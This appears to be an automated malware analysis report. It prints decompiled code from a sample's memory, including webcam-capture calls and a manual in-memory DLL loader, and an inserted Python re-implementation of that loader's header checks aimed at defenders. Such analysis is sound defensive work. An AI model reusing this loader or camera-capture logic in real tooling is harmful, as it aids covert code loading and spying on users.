                    												 *_t146 = 0x3e8;
                    												Sleep(??);
                    												_t120 = _t62;
                    												E1059558C(_a4, _t62, __eflags);
                    												 *0x46bac0();
                    											}
                    										}
                    									}
                    								}
                    							}
                    						}
                    						E10592CE2( &_v52, _t120);
                    						E10592E35();
                    						E10592E35();
                    						__eflags = 0;
                    						return 0;
                    					} else {
                    						_t65 = _t120 + _t78;
                    						_a12 = _t120 + _t78;
                    						__eflags = _t78;
                    						if(__eflags != 0) {
                    							_push(0);
                    							_t67 = E10593683(_t78, _t129, _t120, _t125, __eflags, _t65);
                    							__eflags = _t67;
                    							if(_t67 != 0) {
                    								_push( *_a8);
                    								_t69 = E10593097(_t129);
                    								E1059240D(E10593097(_t129) + _t78 * 2, _t69);
                    								_push(_t78);
                    								E105923F9(E10593097(_t129), _t125);
                    								E105936F6(_a12);
                    							}
                    						}
                    						_t66 = _t129;
                    						goto L7;
                    					}
                    				} else {
                    					_t66 = E1059442D(__ebx, _t129, __edx, _t125 - E10593097(_t81) >> 1, _t129, _t152, _t81, _t129, _t125 - E10593097(_t81) >> 1, _a12);
                    					L7:
                    					return _t66;
                    				}
                    			}

                    [Instruction address column for the listing above: one address per decompiled statement, 0x105952f8 to 0x1059558b]

                    APIs
                      • Part of subcall function 10593746: std::_Xinvalid_argument.LIBCPMT ref: 1059374B
                    • Sleep.KERNEL32(00000000,?), ref: 10595449
                      • Part of subcall function 1059558C: __EH_prolog.LIBCMT ref: 10595591
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: H_prologSleepXinvalid_argumentstd::_
                    • String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera
                    • API String ID: 834325642-3547787478
                    • Opcode ID: 0f947f4514c31b9979c70bfd55ff0e94cfeb83e6e03146887a9589aee2dda04e
                    • Instruction ID: 4c16aa22396e4aef4bde0532967c0545b640a4c836c3628ea3c1b80be6944406
                    • Opcode Fuzzy Hash: 0f947f4514c31b9979c70bfd55ff0e94cfeb83e6e03146887a9589aee2dda04e
                    • Instruction Fuzzy Hash: 7E510579A04200ABCB00AB74CC5EA6E3F5ADFC1694F004429F8059B791EF74AE19C7D6
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                      • Part of subcall function 004028D8: std::_Xinvalid_argument.LIBCPMT ref: 004028DD
                    • Sleep.KERNEL32(00000000,?), ref: 004045DB
                      • Part of subcall function 0040471E: __EH_prolog.LIBCMT ref: 00404723
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: H_prologSleepXinvalid_argumentstd::_
                    • String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera
                    • API String ID: 834325642-3547787478
                    • Opcode ID: 337efe400a13bf0863073eb3597778a622aea2c053e20aeb55c4ca0a1acbd334
                    • Instruction ID: 36a5e228549547fe3264f4e150403a2e0a3e3e2746ad4685d8a770f54e79c9b4
                    • Opcode Fuzzy Hash: 337efe400a13bf0863073eb3597778a622aea2c053e20aeb55c4ca0a1acbd334
                    • Instruction Fuzzy Hash: 6651E4B1604200ABCA05BB769D0A66E3B559BC5308F00443FF905BB7E2EF7D8945879E
                    Uniqueness

                    Uniqueness Score: -1.00%
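The two camera-handler listings above call E105A0509 and then resolve OpenCamera, CloseCamera, GetFrame and FreeFrame by name through E105A079F, so the camera DLL is obtained without a LoadLibrary on a file. The E105A0515 listing that follows (adjacent to E105A0509 in the same module) shows the loader's front half: it requires the MZ and PE signatures, an i386 machine type (0x14c), an even SectionAlignment, and that SizeOfImage rounded up to the page size from GetNativeSystemInfo equals the end of the last section rounded the same way; it then reserves memory at ImageBase (MEM_COMMIT|MEM_RESERVE, PAGE_READWRITE, falling back to any address), keeps a 0x40-byte heap context whose offset 0x14 holds the Characteristics DLL bit, copies SizeOfHeaders bytes, copies sections, relocates when the allocation missed ImageBase, resolves imports, and calls AddressOfEntryPoint with DLL_PROCESS_ATTACH, setting 0x45a (ERROR_DLL_INIT_FAILED) if that returns zero and 0xe (ERROR_OUTOFMEMORY) when allocation fails. As an added example, not code from the report or from the sample, here is a Python re-implementation of those header checks and of the header/section layout step, run against a constructed PE32; the function names, the field dictionary and the test image are the example's own.

```python
"""Added example (not code from the report or from the sample): a Python
re-implementation of the header checks and image-size computation that the
decompiled E105A0515 listing performs before mapping a PE held in memory,
applied to a constructed PE32. Offsets are those of IMAGE_NT_HEADERS32."""
import struct

IMAGE_DOS_SIGNATURE = 0x5A4D        # 'MZ'
IMAGE_NT_SIGNATURE = 0x4550         # 'PE\0\0'
IMAGE_FILE_MACHINE_I386 = 0x14C     # the listing accepts only 32-bit x86 images
IMAGE_FILE_DLL = 0x2000             # Characteristics bit 13, (c >> 13) & 1 in the listing
PAGE_SIZE = 0x1000                  # the loader reads this from GetNativeSystemInfo


class LoaderCheckError(ValueError):
    """Raised where the listing gives up and returns 0."""


def align_up(value, alignment):
    return (value + alignment - 1) // alignment * alignment


def validate_image(data, page_size=PAGE_SIZE):
    """Apply the listing's checks to a PE image in memory and return the fields
    the loader keeps in its context structure."""
    if len(data) < 0x40 or struct.unpack_from("<H", data, 0)[0] != IMAGE_DOS_SIGNATURE:
        raise LoaderCheckError("missing MZ header")
    nt = struct.unpack_from("<I", data, 0x3C)[0]                  # e_lfanew
    if len(data) < nt + 0xF8:                                     # sizeof(IMAGE_NT_HEADERS32)
        raise LoaderCheckError("NT headers truncated")
    if struct.unpack_from("<I", data, nt)[0] != IMAGE_NT_SIGNATURE:
        raise LoaderCheckError("missing PE signature")
    machine, nsections = struct.unpack_from("<HH", data, nt + 4)
    opt_size, characteristics = struct.unpack_from("<HH", data, nt + 0x14)
    if machine != IMAGE_FILE_MACHINE_I386:
        raise LoaderCheckError("not an i386 image")
    section_alignment = struct.unpack_from("<I", data, nt + 0x38)[0]
    if section_alignment & 1:
        raise LoaderCheckError("odd SectionAlignment")
    image_base, = struct.unpack_from("<I", data, nt + 0x34)
    entry_rva, = struct.unpack_from("<I", data, nt + 0x28)
    size_of_image, size_of_headers = struct.unpack_from("<II", data, nt + 0x50)
    # Section loop from the listing: end of the furthest section, using
    # SectionAlignment for sections that carry no raw data.
    first_section = nt + 0x18 + opt_size
    sections, last_end = [], 0
    for i in range(nsections):
        vaddr, raw_size, raw_off = struct.unpack_from("<III", data, first_section + i * 0x28 + 0xC)
        sections.append((vaddr, raw_size, raw_off))
        last_end = max(last_end, vaddr + (raw_size or section_alignment))
    aligned_size = align_up(size_of_image, page_size)
    if aligned_size != align_up(last_end, page_size):
        raise LoaderCheckError("SizeOfImage disagrees with section table")
    if len(data) < size_of_headers:
        raise LoaderCheckError("SizeOfHeaders out of bounds")
    return {"is_dll": bool(characteristics & IMAGE_FILE_DLL), "image_base": image_base,
            "entry_rva": entry_rva, "aligned_size": aligned_size,
            "size_of_headers": size_of_headers, "sections": sections}


def map_image(data, load_address=None, page_size=PAGE_SIZE):
    """Lay the image out as the loader does: headers first, then each section at
    its VirtualAddress. Returns (info, mapped bytes, needs_relocation)."""
    info = validate_image(data, page_size)
    image = bytearray(info["aligned_size"])
    image[:info["size_of_headers"]] = data[:info["size_of_headers"]]
    for vaddr, raw_size, raw_off in info["sections"]:
        if raw_size:                                  # sections without raw data stay zero-filled
            image[vaddr:vaddr + raw_size] = data[raw_off:raw_off + raw_size]
    if load_address is None:
        load_address = info["image_base"]             # the listing's first VirtualAlloc attempt
    # Relocations are applied only when the block landed away from ImageBase.
    return info, bytes(image), load_address != info["image_base"]


def reject_reason(data):
    """None when the loader's checks pass, otherwise the failing check."""
    try:
        validate_image(data)
    except LoaderCheckError as exc:
        return str(exc)
    return None


def build_test_pe(machine=IMAGE_FILE_MACHINE_I386, size_of_image=0x2000, is_dll=True):
    """Constructed PE32 with a single .text section; not a real binary."""
    e_lfanew = 0x40
    dos = bytearray(e_lfanew)
    struct.pack_into("<H", dos, 0, IMAGE_DOS_SIGNATURE)
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    chars = 0x0102 | (IMAGE_FILE_DLL if is_dll else 0)   # EXECUTABLE_IMAGE | 32BIT_MACHINE
    file_hdr = struct.pack("<IHHIIIHH", IMAGE_NT_SIGNATURE, machine, 1, 0, 0, 0, 0xE0, chars)
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0x00, 0x10B)                   # PE32 magic
    struct.pack_into("<I", opt, 0x10, 0x1000)                  # AddressOfEntryPoint
    struct.pack_into("<I", opt, 0x1C, 0x10000000)              # ImageBase
    struct.pack_into("<II", opt, 0x20, 0x1000, 0x200)          # SectionAlignment, FileAlignment
    struct.pack_into("<II", opt, 0x38, size_of_image, 0x200)   # SizeOfImage, SizeOfHeaders
    sect = struct.pack("<8sIIIIIIHHI", b".text", 0x200, 0x1000, 0x200, 0x200, 0, 0, 0, 0, 0x60000020)
    headers = bytes(dos + file_hdr + opt + sect).ljust(0x200, b"\0")
    return headers + b"\xC3" * 0x200                           # section body: 'ret' filler
```

The SizeOfImage-versus-section-table check is the one a defender can reuse directly: a dumped region whose headers pass it is a candidate for a manually mapped module even though no loaded-module list entry exists for it, and the DLL bit decides whether the loader invoked the entry point or merely recorded it.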

                    C-Code - Quality: 80%
                    			E105A0515(intOrPtr __ecx, intOrPtr __edx, void* __eflags) {
                    				intOrPtr _v8;
                    				signed int _v12;
                    				intOrPtr _v16;
                    				intOrPtr _v20;
                    				intOrPtr _v52;
                    				char _v56;
                    				signed int _t59;
                    				signed int _t61;
                    				void* _t65;
                    				void* _t68;
                    				signed int _t73;
                    				void* _t79;
                    				signed int _t80;
                    				void* _t81;
                    				signed int _t83;
                    				signed int _t84;
                    				signed int _t86;
                    				signed int _t88;
                    				signed int _t89;
                    				signed int _t92;
                    				void* _t93;
                    				signed int _t94;
                    				intOrPtr* _t97;
                    				signed int _t99;
                    				signed int _t114;
                    				void* _t116;
                    				signed int _t119;
                    				void* _t125;
                    				signed int _t127;
                    				intOrPtr _t129;
                    				signed int _t130;
                    				void* _t131;
                    				signed int _t132;
                    				void* _t133;
                    				void* _t134;
                    
                    				_t116 = 0x40;
                    				_v16 = __edx;
                    				_v8 = __ecx;
                    				_t125 = 0;
                    				if(E1059FFB8(__edx, _t116) == 0) {
                    					L33:
                    					return 0;
                    				}
                    				if( *((intOrPtr*)(__ecx)) == 0x5a4d) {
                    					_t59 = E1059FFB8(__edx,  *((intOrPtr*)(__ecx + 0x3c)) + 0xf8);
                    					__eflags = _t59;
                    					if(_t59 == 0) {
                    						goto L33;
                    					}
                    					_t97 =  *((intOrPtr*)(__ecx + 0x3c)) + __ecx;
                    					__eflags =  *_t97 - 0x4550;
                    					if( *_t97 != 0x4550) {
                    						goto L2;
                    					}
                    					__eflags =  *((intOrPtr*)(_t97 + 4)) - 0x14c;
                    					if( *((intOrPtr*)(_t97 + 4)) != 0x14c) {
                    						goto L2;
                    					}
                    					__eflags =  *(_t97 + 0x38) & 0x00000001;
                    					if(( *(_t97 + 0x38) & 0x00000001) != 0) {
                    						goto L2;
                    					}
                    					_t119 =  *(_t97 + 6) & 0x0000ffff;
                    					_t61 =  *(_t97 + 0x14) & 0x0000ffff;
                    					__eflags = _t119;
                    					if(_t119 == 0) {
                    						L14:
                    						 *0x4530d8( &_v56);
                    						_t129 = E1059FFA7( *((intOrPtr*)(_t97 + 0x50)), _v52);
                    						_v20 = _t129;
                    						_t65 = E1059FFA7(_t125, _v52);
                    						__eflags = _t129 - _t65;
                    						if(_t129 != _t65) {
                    							goto L2;
                    						}
                    						_push(0);
                    						_t130 = E105A04B1( *((intOrPtr*)(_t97 + 0x34)), _t129, 0x3000, 4);
                    						_t134 = _t133 + 0x14;
                    						_v12 = _t130;
                    						__eflags = _t130;
                    						if(_t130 != 0) {
                    							L18:
                    							_t68 = RtlAllocateHeap(GetProcessHeap(), 8, 0x40);
                    							_t127 = _t68;
                    							__eflags = _t127;
                    							if(_t127 != 0) {
                    								 *(_t127 + 4) = _t130;
                    								 *(_t127 + 0x34) =  *(_t127 + 0x34) & 0x00000000;
                    								 *((intOrPtr*)(_t127 + 0x1c)) = 0x40f643;
                    								 *(_t127 + 0x14) = ( *(_t97 + 0x16) & 0x0000ffff) >> 0x0000000d & 0x00000001;
                    								 *((intOrPtr*)(_t127 + 0x20)) = 0x40f65a;
                    								 *((intOrPtr*)(_t127 + 0x24)) = 0x40f66e;
                    								 *((intOrPtr*)(_t127 + 0x28)) = 0x40f67c;
                    								 *((intOrPtr*)(_t127 + 0x2c)) = 0x40f68d;
                    								 *((intOrPtr*)(_t127 + 0x3c)) = _v52;
                    								_t73 = E1059FFB8(_v16,  *((intOrPtr*)(_t97 + 0x54)));
                    								__eflags = _t73;
                    								if(_t73 == 0) {
                    									L32:
                    									E105A08B5(_t127);
                    									goto L33;
                    								}
                    								_push(0);
                    								_t131 = E105A04B1(_t130,  *((intOrPtr*)(_t97 + 0x54)), 0x1000, 4);
                    								E105C334E(_t131, _v8,  *((intOrPtr*)(_t97 + 0x54)));
                    								_t43 = _v8 + 0x3c; // 0x4530cc
                    								_t79 =  *_t43 + _t131;
                    								_t132 = _v12;
                    								 *_t127 = _t79;
                    								 *((intOrPtr*)(_t79 + 0x34)) = _t132;
                    								_t80 = E1059FFCB(_v8, _v16, _t97, _t127);
                    								__eflags = _t80;
                    								if(_t80 == 0) {
                    									goto L32;
                    								}
                    								_t81 =  *_t127;
                    								_t124 =  *((intOrPtr*)(_t81 + 0x34)) ==  *((intOrPtr*)(_t97 + 0x34));
                    								__eflags =  *((intOrPtr*)(_t81 + 0x34)) ==  *((intOrPtr*)(_t97 + 0x34));
                    								if( *((intOrPtr*)(_t81 + 0x34)) ==  *((intOrPtr*)(_t97 + 0x34))) {
                    									_t99 = 1;
                    									__eflags = 1;
                    									 *((intOrPtr*)(_t127 + 0x18)) = 1;
                    								} else {
                    									 *((intOrPtr*)(_t127 + 0x18)) = E105A02C7(_t127, _t124);
                    									_t99 = 1;
                    								}
                    								__eflags = E105A036C(_t127);
                    								if(__eflags != 0) {
                    									_t83 = E105A0172(_t127, __eflags);
                    									__eflags = _t83;
                    									if(_t83 == 0) {
                    										goto L32;
                    									}
                    									_t84 = E105A0296(_t127);
                    									__eflags = _t84;
                    									if(_t84 == 0) {
                    										goto L32;
                    									}
                    									_t86 =  *( *_t127 + 0x28);
                    									__eflags = _t86;
                    									if(_t86 == 0) {
                    										_t54 = _t127 + 0x38;
                    										 *_t54 =  *(_t127 + 0x38) & 0x00000000;
                    										__eflags =  *_t54;
                    										L38:
                    										return _t127;
                    									}
                    									_t88 = _t86 + _t132;
                    									__eflags =  *(_t127 + 0x14);
                    									if( *(_t127 + 0x14) == 0) {
                    										 *(_t127 + 0x38) = _t88;
                    										goto L38;
                    									}
                    									_t89 =  *_t88(_t132, _t99, 0);
                    									__eflags = _t89;
                    									if(_t89 != 0) {
                    										 *((intOrPtr*)(_t127 + 0x10)) = _t99;
                    										goto L38;
                    									}
                    									SetLastError(0x45a);
                    								}
                    								goto L32;
                    							}
                    							_push(_t68);
                    							E105A04C8(_t130, _t68, 0x8000);
                    							L17:
                    							_push(0xe);
                    							L3:
                    							SetLastError();
                    							goto L33;
                    						}
                    						_push(0);
                    						_t92 = E105A04B1(0, _v20, 0x3000, 4);
                    						_t130 = _t92;
                    						_v12 = _t92;
                    						_t134 = _t134 + 0x14;
                    						__eflags = _t130;
                    						if(_t130 != 0) {
                    							goto L18;
                    						}
                    						goto L17;
                    					}
                    					_t114 = _t97 + 0x24 + _t61;
                    					__eflags = _t114;
                    					do {
                    						__eflags =  *(_t114 + 4);
                    						_t93 =  *_t114;
                    						if( *(_t114 + 4) != 0) {
                    							_t94 = _t93 +  *(_t114 + 4);
                    							__eflags = _t94;
                    						} else {
                    							_t94 = _t93 +  *(_t97 + 0x38);
                    						}
                    						__eflags = _t94 - _t125;
                    						_t125 =  >  ? _t94 : _t125;
                    						_t114 = _t114 + 0x28;
                    						_t119 = _t119 - 1;
                    						__eflags = _t119;
                    					} while (_t119 != 0);
                    					goto L14;
                    				}
                    				L2:
                    				_push(0xc1);
                    				goto L3;
                    			}

                    APIs
                      • Part of subcall function 1059FFB8: SetLastError.KERNEL32(0000000D,105A0534,0045F464,00000000,?), ref: 1059FFBE
                    • SetLastError.KERNEL32(000000C1,0045F464,00000000,?), ref: 105A054B
                    • GetNativeSystemInfo.KERNEL32(?,0045F464,00000000,?), ref: 105A05BE
                    • GetProcessHeap.KERNEL32(00000008,00000040), ref: 105A062A
                    • RtlAllocateHeap.NTDLL(00000000), ref: 105A0631
                    • SetLastError.KERNEL32(0000045A), ref: 105A0743
                      • Part of subcall function 105A04C8: VirtualFree.KERNEL32(00008000,00000000,00000000,?,105A064A,00000000,00000000,00008000,00000000), ref: 105A04D4
                    Memory Dump Source
                    • Source File: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: ErrorLast$Heap$AllocateFreeInfoNativeProcessSystemVirtual
                    • String ID:
                    • API String ID: 2470655666-0
                    • Opcode ID: eb120fceeea753676480937062db3c536b07788e457956489b4c9a7f2f50d659
                    • Instruction ID: f3b57434fa288600dee248f6c89eb7764ed500daf2e7ebfcd709cc337fb424f3
                    • Opcode Fuzzy Hash: eb120fceeea753676480937062db3c536b07788e457956489b4c9a7f2f50d659
                    • Instruction Fuzzy Hash: 7B610D75A10201EBDB409F65CD85B6EBFA6FF88790F009069FA089B680DB74F951CBD4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                      • Part of subcall function 0040F14A: SetLastError.KERNEL32(0000000D,0040F6C6,00000000,00000000,0040AF7B), ref: 0040F150
                    • SetLastError.KERNEL32(000000C1,00000000,00000000,0040AF7B), ref: 0040F6DD
                    • GetNativeSystemInfo.KERNEL32(?,00000000,00000000,0040AF7B), ref: 0040F750
                    • GetProcessHeap.KERNEL32(00000008,00000040), ref: 0040F7BC
                    • HeapAlloc.KERNEL32(00000000), ref: 0040F7C3
                    • SetLastError.KERNEL32(0000045A), ref: 0040F8D5
                      • Part of subcall function 0040F65A: VirtualFree.KERNEL32(00008000,00000000,00000000,?,0040F7DC,00000000,00000000,00008000,00000000), ref: 0040F666
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: ErrorLast$Heap$AllocFreeInfoNativeProcessSystemVirtual
                    • String ID:
                    • API String ID: 486403682-0
                    • Opcode ID: eb120fceeea753676480937062db3c536b07788e457956489b4c9a7f2f50d659
                    • Instruction ID: 31fca79699fb41a21c899f6cb63a77230b732fc93c9d9a7c568002a0e8237c26
                    • Opcode Fuzzy Hash: eb120fceeea753676480937062db3c536b07788e457956489b4c9a7f2f50d659
                    • Instruction Fuzzy Hash: 66610771A00201ABCB30AF65CC81B6A77A5BF44744F14403AE804BBBC1D77CED4ADB99
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                      • Part of subcall function 0043F98C: RtlAllocateHeap.NTDLL(00000000,0043001C,?,?,00431747,?,?,0046C500,?,?,0040B6CB,0043001C,?,?,?,?), ref: 0043F9BE
                    • _free.LIBCMT ref: 0043E65B
                    • _free.LIBCMT ref: 0043E672
                    • _free.LIBCMT ref: 0043E691
                    • _free.LIBCMT ref: 0043E6AC
                    • _free.LIBCMT ref: 0043E6C3
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: _free$AllocateHeap
                    • String ID:
                    • API String ID: 3033488037-0
                    • Opcode ID: 0e44e192ae9f7449bc2dcdd52dfacc8fa8f025cb327802adf5d2bcb5333049c9
                    • Instruction ID: 9ca46151fc1eb59705b8745a81b868f81510b806d69f04cfdfe39fc5a4c1e60e
                    • Opcode Fuzzy Hash: 0e44e192ae9f7449bc2dcdd52dfacc8fa8f025cb327802adf5d2bcb5333049c9
                    • Instruction Fuzzy Hash: 2C51E371A02304AFDB20DF2BC842B6A77F4EF5C724F54156EE909D7290E739D9018B88
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 69%
                    			E105D3CD1(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                    				int _v8;
                    				int _v12;
                    				int _v16;
                    				int _v20;
                    				signed int _v56;
                    				char _v268;
                    				intOrPtr _v272;
                    				char _v276;
                    				char _v312;
                    				char _v316;
                    				void* __ebp;
                    				void* _t36;
                    				signed int _t42;
                    				signed int _t50;
                    				void* _t54;
                    				void* _t56;
                    				signed int* _t61;
                    				intOrPtr _t71;
                    				void* _t78;
                    				signed int _t85;
                    				signed int _t87;
                    				signed int _t89;
                    				int _t93;
                    				char** _t96;
                    				signed int _t100;
                    				signed int _t101;
                    				signed int _t106;
                    				signed int _t107;
                    
                    				_t88 = __edi;
                    				_t96 = E105D373B();
                    				_v8 = 0;
                    				_v12 = 0;
                    				_v16 = 0;
                    				_t36 = E105D3799( &_v8);
                    				_pop(_t78);
                    				if(_t36 != 0) {
                    					L19:
                    					_push(0);
                    					_push(0);
                    					_push(0);
                    					_push(0);
                    					_push(0);
                    					E105C77F8();
                    					asm("int3");
                    					_t106 = _t107;
                    					_v56 =  *0x46a00c ^ _t106;
                    					 *0x46a344 =  *0x46a344 | 0xffffffff;
                    					 *0x46a338 =  *0x46a338 | 0xffffffff;
                    					_push(0);
                    					_push(_t96);
                    					_t89 = 0;
                    					 *0x46b748 = 0;
                    					_t42 = E105CA703(__eflags,  &_v316,  &_v312, 0x100, 0x45913c);
                    					__eflags = _t42;
                    					if(_t42 != 0) {
                    						__eflags = _t42 - 0x22;
                    						if(_t42 == 0x22) {
                    							_t101 = E105D07FA(_t78, _v272);
                    							__eflags = _t101;
                    							if(__eflags != 0) {
                    								_t50 = E105CA703(__eflags,  &_v276, _t101, _v272, 0x45913c);
                    								__eflags = _t50;
                    								if(_t50 == 0) {
                    									E105D1063(0);
                    									_t89 = _t101;
                    								} else {
                    									_push(_t101);
                    									goto L25;
                    								}
                    							} else {
                    								_push(0);
                    								L25:
                    								E105D1063();
                    							}
                    						}
                    					} else {
                    						_t89 =  &_v268;
                    					}
                    					asm("sbb esi, esi");
                    					_t100 =  ~(_t89 -  &_v268) & _t89;
                    					__eflags = _t89;
                    					if(__eflags == 0) {
                    						L33:
                    						E105D3CD1(0x45913c, _t89, _t100, __eflags);
                    					} else {
                    						__eflags =  *_t89;
                    						if(__eflags == 0) {
                    							goto L33;
                    						} else {
                    							_push(_t89);
                    							E105D3AFC(0x45913c, _t89, _t100, __eflags);
                    						}
                    					}
                    					E105D1063(_t100);
                    					__eflags = _v12 ^ _t106;
                    					return E105C0B89(_v12 ^ _t106);
                    				} else {
                    					_t54 = E105D3741( &_v12);
                    					_pop(_t78);
                    					if(_t54 != 0) {
                    						goto L19;
                    					} else {
                    						_t56 = E105D376D( &_v16);
                    						_pop(_t78);
                    						if(_t56 != 0) {
                    							goto L19;
                    						} else {
                    							E105D1063( *0x46b740);
                    							 *0x46b740 = 0;
                    							 *_t107 = 0x46b750;
                    							if(GetTimeZoneInformation(??) != 0xffffffff) {
                    								_t85 =  *0x46b750 * 0x3c;
                    								_t87 =  *0x46b7a4;
                    								_push(__edi);
                    								 *0x46b748 = 1;
                    								_v8 = _t85;
                    								if( *0x46b796 != 0) {
                    									_v8 = _t85 + _t87 * 0x3c;
                    								}
                    								if( *0x46b7ea == 0) {
                    									L9:
                    									_v12 = 0;
                    									_v16 = 0;
                    								} else {
                    									_t71 =  *0x46b7f8;
                    									if(_t71 == 0) {
                    										goto L9;
                    									} else {
                    										_v12 = 1;
                    										_v16 = (_t71 - _t87) * 0x3c;
                    									}
                    								}
                    								_t93 = E105D03C9(0, _t87);
                    								if(WideCharToMultiByte(_t93, 0, 0x46b754, 0xffffffff,  *_t96, 0x3f, 0,  &_v20) == 0 || _v20 != 0) {
                    									 *( *_t96) = 0;
                    								} else {
                    									( *_t96)[0x3f] = 0;
                    								}
                    								if(WideCharToMultiByte(_t93, 0, 0x46b7a8, 0xffffffff, _t96[1], 0x3f, 0,  &_v20) == 0 || _v20 != 0) {
                    									 *(_t96[1]) = 0;
                    								} else {
                    									_t96[1][0x3f] = 0;
                    								}
                    							}
                    							 *(E105D3735()) = _v8;
                    							 *(E105D3729()) = _v12;
                    							_t61 = E105D372F();
                    							 *_t61 = _v16;
                    							return _t61;
                    						}
                    					}
                    				}
                    			}

                    APIs
                    • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045913C), ref: 105D3D3B
                    • WideCharToMultiByte.KERNEL32(00000000,00000000,0046B754,000000FF,00000000,0000003F,00000000,?,?), ref: 105D3DB3
                    • WideCharToMultiByte.KERNEL32(00000000,00000000,0046B7A8,000000FF,?,0000003F,00000000,?), ref: 105D3DE0
                    • _free.LIBCMT ref: 105D3D29
                      • Part of subcall function 105D1063: HeapFree.KERNEL32(00000000,00000000,?,105D9D5D,?,00000000,?,00000000,?,105DA001,?,00000007,?,?,105DA54C,?), ref: 105D1079
                      • Part of subcall function 105D1063: GetLastError.KERNEL32(?,?,105D9D5D,?,00000000,?,00000000,?,105DA001,?,00000007,?,?,105DA54C,?,?), ref: 105D108B
                    • _free.LIBCMT ref: 105D3EF5
                    Memory Dump Source
                    • Source File: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                    • String ID:
                    • API String ID: 1286116820-0
                    • Opcode ID: c3f2cfdb3fc9e5fdbcd299a8a699101136a47d9c1e3267c5a46447a5912354ea
                    • Instruction ID: 73e4f9793159db4c8c6118ffdf4dcf41e349dd13d24066afabaebae3b3a1a762
                    • Opcode Fuzzy Hash: c3f2cfdb3fc9e5fdbcd299a8a699101136a47d9c1e3267c5a46447a5912354ea
                    • Instruction Fuzzy Hash: 6851D6B5900349EBC700DF6DDC8599ABFBCEF80391B11866BE410D7391EB709E418B95
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 82%
                    			E105CE4DB(signed int* __ecx, signed int __edx) {
                    				signed int _v8;
                    				intOrPtr* _v12;
                    				signed int _v16;
                    				signed int _t28;
                    				signed int _t29;
                    				intOrPtr _t33;
                    				signed int _t37;
                    				signed int _t38;
                    				signed int _t40;
                    				void* _t50;
                    				signed int _t56;
                    				intOrPtr* _t57;
                    				signed int _t68;
                    				signed int _t71;
                    				signed int _t72;
                    				signed int _t74;
                    				signed int _t75;
                    				signed int _t78;
                    				signed int _t80;
                    				signed int* _t81;
                    				signed int _t85;
                    				void* _t86;
                    
                    				_t72 = __edx;
                    				_v12 = __ecx;
                    				_t28 =  *__ecx;
                    				_t81 =  *_t28;
                    				if(_t81 != 0) {
                    					_t29 =  *0x46a00c;
                    					_t56 =  *_t81 ^ _t29;
                    					_t78 = _t81[1] ^ _t29;
                    					_t83 = _t81[2] ^ _t29;
                    					asm("ror edi, cl");
                    					asm("ror esi, cl");
                    					asm("ror ebx, cl");
                    					if(_t78 != _t83) {
                    						L14:
                    						 *_t78 = E105CE39C( *((intOrPtr*)( *((intOrPtr*)(_v12 + 4)))));
                    						_t33 = E105BFF0A(_t56);
                    						_t57 = _v12;
                    						 *((intOrPtr*)( *((intOrPtr*)( *_t57)))) = _t33;
                    						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 4)) = E105BFF0A(_t78 + 4);
                    						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 8)) = E105BFF0A(_t83);
                    						_t37 = 0;
                    						L15:
                    						return _t37;
                    					}
                    					_t38 = 0x200;
                    					_t85 = _t83 - _t56 >> 2;
                    					if(_t85 <= 0x200) {
                    						_t38 = _t85;
                    					}
                    					_t80 = _t38 + _t85;
                    					if(_t80 == 0) {
                    						_t80 = 0x20;
                    					}
                    					if(_t80 < _t85) {
                    						L9:
                    						_push(4);
                    						_t80 = _t85 + 4;
                    						_push(_t80);
                    						_v8 = E105D8BC3(_t56);
                    						_t40 = E105D1063(0);
                    						_t68 = _v8;
                    						_t86 = _t86 + 0x10;
                    						if(_t68 != 0) {
                    							goto L11;
                    						}
                    						_t37 = _t40 | 0xffffffff;
                    						goto L15;
                    					} else {
                    						_push(4);
                    						_push(_t80);
                    						_v8 = E105D8BC3(_t56);
                    						E105D1063(0);
                    						_t68 = _v8;
                    						_t86 = _t86 + 0x10;
                    						if(_t68 != 0) {
                    							L11:
                    							_t56 = _t68;
                    							_v8 = _t68 + _t85 * 4;
                    							_t83 = _t68 + _t80 * 4;
                    							_t78 = _v8;
                    							_push(0x20);
                    							asm("ror eax, cl");
                    							_t71 = _t78;
                    							_v16 = 0 ^  *0x46a00c;
                    							asm("sbb edx, edx");
                    							_t74 =  !_t72 & _t68 + _t80 * 0x00000004 - _t78 + 0x00000003 >> 0x00000002;
                    							_v8 = _t74;
                    							if(_t74 == 0) {
                    								goto L14;
                    							}
                    							_t75 = _v16;
                    							_t50 = 0;
                    							do {
                    								_t50 = _t50 + 1;
                    								 *_t71 = _t75;
                    								_t71 = _t71 + 4;
                    							} while (_t50 != _v8);
                    							goto L14;
                    						}
                    						goto L9;
                    					}
                    				}
